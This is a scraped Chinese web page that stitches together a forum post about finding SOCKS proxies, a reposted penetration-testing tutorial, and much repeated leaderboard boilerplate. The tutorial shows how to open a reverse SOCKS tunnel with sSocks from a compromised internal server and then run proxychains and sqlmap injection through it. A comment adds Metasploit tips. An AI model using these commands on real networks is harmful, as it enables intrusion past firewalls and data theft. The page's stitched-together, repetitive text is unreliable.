他的最新文章
他的热门文章
您举报文章：
举报原因：
原文地址：
原因补充：
(最多只允许输入30个字)2009年7月 总版技术专家分月排行榜第二2009年3月 总版技术专家分月排行榜第二2009年1月 总版技术专家分月排行榜第二2005年7月 总版技术专家分月排行榜第二2005年5月 总版技术专家分月排行榜第二2005年3月 总版技术专家分月排行榜第二
优秀小版主2015年8月优秀小版主2015年9月优秀小版主2015年5月优秀小版主2015年2月论坛优秀版主
本帖子已过去太久远了，不再提供回复功能。手把手教你用GatherProxy,自己找SOCKS代理
我的图书馆
手把手教你用GatherProxy,自己找SOCKS代理
手把手教你用GatherProxy,自己找SOCKS代理
来自&作者：&
& &&&暴力工具就是一个玩具，大家玩玩就好。打得通就用十档，打不通就用五档。赚钱与否和L2没有正相关关系。有条件的童鞋，建议买正版。&& &&&早前提供给童鞋们的代理寻找工具GATHERPROXY，在这个帖子里：，很受朋友们欢迎。但仍有部分不懂E文的童鞋要求楼主，教一下怎么使用软件。庆贺大盘上了3100点，做了下面这个教程。希望能帮到这部分童鞋。&[&本帖最后由 九分之玖 于
09:41 编辑&]股
馆藏&18232
TA的最新馆藏[转]&[转]&[转]&
喜欢该文的人也喜欢Socks代理反弹突破内网 - FreeBuf.COM | 关注黑客与极客
Socks代理反弹突破内网
共2281103人围观
，发现 24 个不明物体
随着信息安全意识的提升，越来越多的信息系统前端均部署有防火墙，系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中，如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来，利用相关的策略有效避免或减轻来自外部的攻击。
对于渗透测试者来说，如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题，本文介绍了在夺取映射到外网的内网服务器权限后，如何利用socks代理反弹获得内网访问权限。
sSocks是一个工具套装，可用来开启socks代理服务，支持socks5验证，支持IPV6和UDP，并提供反向socks代理服务，即将远程计算机作为socks代理服务端，反弹回本地，极大方便内网的渗透测试，其最新版为0.0.13，可在以下链接处下载。
下载解压后，执行命令编译。
./configure && make
编译完成，进入src目录，会发现有nsocks、ssocksd、ssocks、rcsocks，其功能说明介绍如下：
程序&功能nsocks&类似通过Socks5代理后的netcat，可用来测试socks serverssocksd&用来开启Socks5代理服务ssocks&本地启用Socks5服务，并反弹到另一IP地址rcsocks&接收反弹过来的Socks5服务，并转向另一端口
2.模拟网络环境说明
&本文模拟的网络环境见下图1，渗透测试端IP为192.168.10.50，内网区域IP段192.168.206.0/24，内网区域能正常访问192.168.10.0/24，现假设已获得192.168.206.130权限。&
3.实施Socks代理反弹1)本地监听端口在渗透测试端192.168.10.50执行
./rcsocks -l 1088 -p 1080 -vv
等待远程Socks5服务器访问本地1080端口，创建端口1080与本地端口1088的连接通道，如图2。&
2)开启Socks5代理服务，反弹在192.168.206.130上执行
./rssocks -vv -s 192.168.10.50:1080
启用Socks5服务，反弹到192.168.10.50的端口1080上，如图3。&
此时在渗透测试端192.168.10.50可看到通道连接成功，效果如图4。
4.利用proxychains进行Socks5代理通过前面的步骤，Socks5代理已创建完成了。由于在渗透测试过程中，需要使用不同的工具程序，而在各程序中分别配置Socks5代理信息较为繁琐，而部分程序并不支持配置Socks5代理。为了简化这些操作，我们可以采用proxychains。proxychains是一个代理客户端软件，可以支持几乎所有程序的代理，如ssh，telnet，ftp等。利用proxychains，程序能在代理的环境下被加载运行，而本身不需要具备代理功能。使用前需要对proxychains进行简单配置，打开配置文件proxychains.conf（在BT5位于/etc/proxychains.conf），如图5所示，在[ProxyList]处添加socks5 127.0.0.1 1088
配置成功后若要启动程序，仅需要在启动程序命令前加上proxychains。1)启用浏览器firefox，在终端执行命令：
proxychains firefox
firefox启动成功，访问192.168.206.135的web服务如图6，通过代理访问成功。
2)利用sqlmap进行注入：先切换到sqlmap目录cd /pentest/database/sqlmapproxychains python sqlmap.py -u “存在SQL注入的链接” –dbs注入成功，注入点信息及获取数据库信息如图7所示。
5.后记由于系统管理员的疏忽或者业务需求所致，防火墙一般仅对由外向内发起的数据连接进行严格判断、过滤、甚至阻断而忽略由内往外的连接。因此，在此种情况下，通过攻陷映射到公网的端口服务，利用反弹便可获取内网访问权限，给内网安全带来极大的威胁。在信息安全建设与运维过程中，不仅要加强映射到公网的服务安全，也要重视由内到外连接的安全威胁。
403Art Co-Funder
lcx.exe是李春晓私自更改了htran（红盟lion的2003年作品，修改自红盟bkbll写的linux下的socket代理工具trtool），linux下使用比较简单的端口转发工具是W.Z.T在2006年写的Lhtran你在当时估计还在上小学呢吧。
话说msf里面就有这个sock模块，很方便，添加route之后，run一下这个模块就可以用proxychains去大杀特杀了。。。。
必须您当前尚未登录。
必须（保密）
这家伙太懒，还未填写个人描述！
关注我们 分享每日精选文章2004年7月 Linux/Unix社区大版内专家分月排行榜第二
2004年4月 Linux/Unix社区大版内专家分月排行榜第三
2004年3月 C++ Builder大版内专家分月排行榜第二2003年12月 C++ Builder大版内专家分月排行榜第二2003年11月 C++ Builder大版内专家分月排行榜第二2003年9月 C++ Builder大版内专家分月排行榜第二2003年8月 C++ Builder大版内专家分月排行榜第二2003年7月 C++ Builder大版内专家分月排行榜第二2006年1月 专题开发/技术/项目大版内专家分月排行榜第二2004年12月 专题开发/技术/项目大版内专家分月排行榜第二2004年8月 专题开发/技术/项目大版内专家分月排行榜第二2004年6月 专题开发/技术/项目大版内专家分月排行榜第二2004年2月 专题开发/技术/项目大版内专家分月排行榜第二2003年10月 专题开发/技术/项目大版内专家分月排行榜第二
2006年4月 C++ Builder大版内专家分月排行榜第三2005年12月 C++ Builder大版内专家分月排行榜第三2003年6月 C++ Builder大版内专家分月排行榜第三2006年4月 专题开发/技术/项目大版内专家分月排行榜第三2004年9月 专题开发/技术/项目大版内专家分月排行榜第三2004年1月 专题开发/技术/项目大版内专家分月排行榜第三
2004年3月 C++ Builder大版内专家分月排行榜第二2003年12月 C++ Builder大版内专家分月排行榜第二2003年11月 C++ Builder大版内专家分月排行榜第二2003年9月 C++ Builder大版内专家分月排行榜第二2003年8月 C++ Builder大版内专家分月排行榜第二2003年7月 C++ Builder大版内专家分月排行榜第二2006年1月 专题开发/技术/项目大版内专家分月排行榜第二2004年12月 专题开发/技术/项目大版内专家分月排行榜第二2004年8月 专题开发/技术/项目大版内专家分月排行榜第二2004年6月 专题开发/技术/项目大版内专家分月排行榜第二2004年2月 专题开发/技术/项目大版内专家分月排行榜第二2003年10月 专题开发/技术/项目大版内专家分月排行榜第二
2006年4月 C++ Builder大版内专家分月排行榜第三2005年12月 C++ Builder大版内专家分月排行榜第三2003年6月 C++ Builder大版内专家分月排行榜第三2006年4月 专题开发/技术/项目大版内专家分月排行榜第三2004年9月 专题开发/技术/项目大版内专家分月排行榜第三2004年1月 专题开发/技术/项目大版内专家分月排行榜第三
2004年3月 C++ Builder大版内专家分月排行榜第二2003年12月 C++ Builder大版内专家分月排行榜第二2003年11月 C++ Builder大版内专家分月排行榜第二2003年9月 C++ Builder大版内专家分月排行榜第二2003年8月 C++ Builder大版内专家分月排行榜第二2003年7月 C++ Builder大版内专家分月排行榜第二2006年1月 专题开发/技术/项目大版内专家分月排行榜第二2004年12月 专题开发/技术/项目大版内专家分月排行榜第二2004年8月 专题开发/技术/项目大版内专家分月排行榜第二2004年6月 专题开发/技术/项目大版内专家分月排行榜第二2004年2月 专题开发/技术/项目大版内专家分月排行榜第二2003年10月 专题开发/技术/项目大版内专家分月排行榜第二
2006年4月 C++ Builder大版内专家分月排行榜第三2005年12月 C++ Builder大版内专家分月排行榜第三2003年6月 C++ Builder大版内专家分月排行榜第三2006年4月 专题开发/技术/项目大版内专家分月排行榜第三2004年9月 专题开发/技术/项目大版内专家分月排行榜第三2004年1月 专题开发/技术/项目大版内专家分月排行榜第三
2004年3月 C++ Builder大版内专家分月排行榜第二2003年12月 C++ Builder大版内专家分月排行榜第二2003年11月 C++ Builder大版内专家分月排行榜第二2003年9月 C++ Builder大版内专家分月排行榜第二2003年8月 C++ Builder大版内专家分月排行榜第二2003年7月 C++ Builder大版内专家分月排行榜第二2006年1月 专题开发/技术/项目大版内专家分月排行榜第二2004年12月 专题开发/技术/项目大版内专家分月排行榜第二2004年8月 专题开发/技术/项目大版内专家分月排行榜第二2004年6月 专题开发/技术/项目大版内专家分月排行榜第二2004年2月 专题开发/技术/项目大版内专家分月排行榜第二2003年10月 专题开发/技术/项目大版内专家分月排行榜第二
2006年4月 C++ Builder大版内专家分月排行榜第三2005年12月 C++ Builder大版内专家分月排行榜第三2003年6月 C++ Builder大版内专家分月排行榜第三2006年4月 专题开发/技术/项目大版内专家分月排行榜第三2004年9月 专题开发/技术/项目大版内专家分月排行榜第三2004年1月 专题开发/技术/项目大版内专家分月排行榜第三
2004年3月 C++ Builder大版内专家分月排行榜第二2003年12月 C++ Builder大版内专家分月排行榜第二2003年11月 C++ Builder大版内专家分月排行榜第二2003年9月 C++ Builder大版内专家分月排行榜第二2003年8月 C++ Builder大版内专家分月排行榜第二2003年7月 C++ Builder大版内专家分月排行榜第二2006年1月 专题开发/技术/项目大版内专家分月排行榜第二2004年12月 专题开发/技术/项目大版内专家分月排行榜第二2004年8月 专题开发/技术/项目大版内专家分月排行榜第二2004年6月 专题开发/技术/项目大版内专家分月排行榜第二2004年2月 专题开发/技术/项目大版内专家分月排行榜第二2003年10月 专题开发/技术/项目大版内专家分月排行榜第二
2006年4月 C++ Builder大版内专家分月排行榜第三2005年12月 C++ Builder大版内专家分月排行榜第三2003年6月 C++ Builder大版内专家分月排行榜第三2006年4月 专题开发/技术/项目大版内专家分月排行榜第三2004年9月 专题开发/技术/项目大版内专家分月排行榜第三2004年1月 专题开发/技术/项目大版内专家分月排行榜第三
本帖子已过去太久远了，不再提供回复功能。}